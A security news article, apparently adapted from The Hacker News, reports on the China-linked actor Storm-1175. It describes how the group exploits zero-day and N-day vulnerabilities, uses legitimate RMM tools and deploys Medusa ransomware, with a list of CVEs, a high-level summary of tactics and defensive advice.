China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware
Storm-1175: مجوعة مرتبطة بالصين كتستغل ثغرات Zero-Day باش تشن هجمات Ransomware Medusa بسرعة خيالية
Storm-1175: China-Linked Actor Exploits Zero-Days for High-Velocity Medusa Ransomware Attacks
TL;DR
The China-based threat actor Storm-1175 is leveraging a combination of zero-day and N-day vulnerabilities to conduct rapid-fire ransomware attacks. By chaining exploits and using legitimate RMM tools, the group has successfully deployed Medusa ransomware in as little as 24 hours, heavily impacting healthcare, finance, and education sectors across the US, UK, and Australia.
A sophisticated, China-linked threat actor identified as Storm-1175 is setting a new standard for operational speed in the cybercriminal world. According to a recent report from the Microsoft Threat Intelligence team, this group is weaponizing both zero-day and recently disclosed vulnerabilities to orchestrate "high-velocity" intrusions that often end in the deployment of Medusa ransomware.
The actor’s proficiency in identifying exposed perimeter assets has allowed them to maintain a high operational tempo, frequently catching organizations off guard during the critical window between vulnerability disclosure and patch application.
High-Velocity Attacks and Global Impact
Storm-1175 does not linger once they gain initial access. The group is known for its ability to exfiltrate data and deploy ransomware within just a few days—and in some cases, in less than 24 hours.
The group’s campaign has primarily targeted critical infrastructure and key economic sectors, including:
- Healthcare
- Education
- Finance
- Professional Services
Geographically, the impact has been felt most acutely in the United States, the United Kingdom, and Australia.
The Weaponization of Zero-Days and N-Days
Since 2023, Storm-1175 has been linked to the exploitation of over 16 different vulnerabilities. Most notably, the actor has utilized zero-day exploits—vulnerabilities unknown to the vendor—before they were publicly disclosed. Two specific examples cited include CVE-2025-10035 (Fortra GoAnywhere MFT) and CVE-2026-23760 (SmarterTools SmarterMail).
The group’s extensive exploit portfolio includes:
- Microsoft Exchange Server: CVE-2023-21529
- Papercut: CVE-2023-27351 and CVE-2023-27350
- Ivanti Connect Secure: CVE-2023-46805 and CVE-2024-21887
- ConnectWise ScreenConnect: CVE-2024-1708 and CVE-2024-1709
- JetBrains TeamCity: CVE-2024-27198 and CVE-2024-27199
- CrushFTP: CVE‑2025‑31161
- BeyondTrust: CVE-2026-1731
In late 2024, the group also began targeting Linux systems, specifically Oracle WebLogic instances. While the exact vulnerability used in the WebLogic attacks remains unknown, the shift signals a broadening of their technical capabilities.
Tactics, Techniques, and Procedures (TTPs)
Storm-1175 employs a "living-off-the-land" strategy to evade detection and maintain persistence. Their methodology involves:
- Persistence & Movement: Creating new user accounts, deploying web shells, and using legitimate Remote Monitoring and Management (RMM) software (e.g., AnyDesk, Atera, or MeshAgent) to move laterally through the network.
- Tooling: Using PowerShell, PsExec, and Impacket for lateral movement, alongside PDQ Deployer for ransomware delivery.
- Security Evasion: Modifying Windows Firewall policies to enable RDP and configuring Microsoft Defender Antivirus exclusions to prevent the blocking of ransomware payloads.
- Credential Theft: Leveraging Mimikatz and Impacket for credential dumping.
- Data Exfiltration: Using Bandizip for collection and Rclone for exfiltration prior to encryption.
The Rise of Dual-Use Infrastructure
One of the most concerning trends highlighted in the report is the actor's reliance on legitimate RMM tools like SimpleHelp and ConnectWise. By using these tools, Storm-1175 can blend its malicious traffic with trusted, encrypted platform communications, making it significantly harder for security teams to distinguish between administrative activity and a cyberattack.
Conclusion
Storm-1175 represents a growing trend of financially motivated actors who possess the technical sophistication usually reserved for state-sponsored espionage. By rotating exploits quickly and capitalizing on the "patch gap," they ensure a high success rate for their Medusa ransomware deployments. Organizations must prioritize the rapid patching of internet-facing assets and monitor for the unauthorized use of RMM tools within their environments to mitigate this evolving threat.
Source: The Hacker News
